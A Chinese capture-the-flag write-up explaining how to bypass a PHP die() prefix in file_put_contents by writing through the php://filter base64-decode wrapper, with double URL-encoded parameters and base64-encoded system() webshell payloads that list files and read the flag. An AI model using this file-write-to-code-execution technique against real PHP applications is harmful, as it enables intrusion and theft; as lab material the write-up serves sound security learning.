神奇这道题我写了一个小时终于写好了
file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);：整个函数调用的作用是将解码后的 $file 作为目标文件路径，然后将前面定义的终止执行提示语句与 $content 的内容拼接起来，一起写入到目标文件中。
意思是要进行url解码然后再写文件并且要绕过死亡（file_put_content）
content是写入内容,要进行base64编码 ，而base解码时,是4个一组,flag.php(要写入的文件),写入的内容<?php die('大佬别秀了');?>，只有phpdie会参与base64解码,因为phpdie只有6个字节,补两个a就是8字节了再与我们写的命令内容进行拼接
下面这篇文章是绕过死亡的
https://xz.aliyun.com/t/8163?time__1311=n4%2BxuDgDBDyGKAKD%3DD7Dl1oQ4iK4%2BD0KqPPoqx&alichlgref=https%3A%2F%2Fxz.aliyun.com%2Ft%2F8163#toc-2
构造payload

/?file=php://filter/write=convert.base64-decode/resource=1.php

两次URL编码（浏览器（hackbar）一次，题目绕过一次）为

?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%31%25%32%65%25%37%30%25%36%38%25%37%30

（工具用的bp的编码器，这个编码器我找了好久好久）

<?php system('ls');?>

进行base64编码

PD9waHAgc3lzdGVtKCdscycpOz8+

POST传参content=aaPD9waHAgc3lzdGVtKCdscycpOz8+
然后查看fl0g.php

<?php system('tac fl0g.php');?>

PD9waHAgc3lzdGVtKCd0YWMgZmwwZy5waHAnKTs/Pg==

content=aaPD9waHAgc3lzdGVtKCd0YWMgZmwwZy5waHAnKTs/Pg==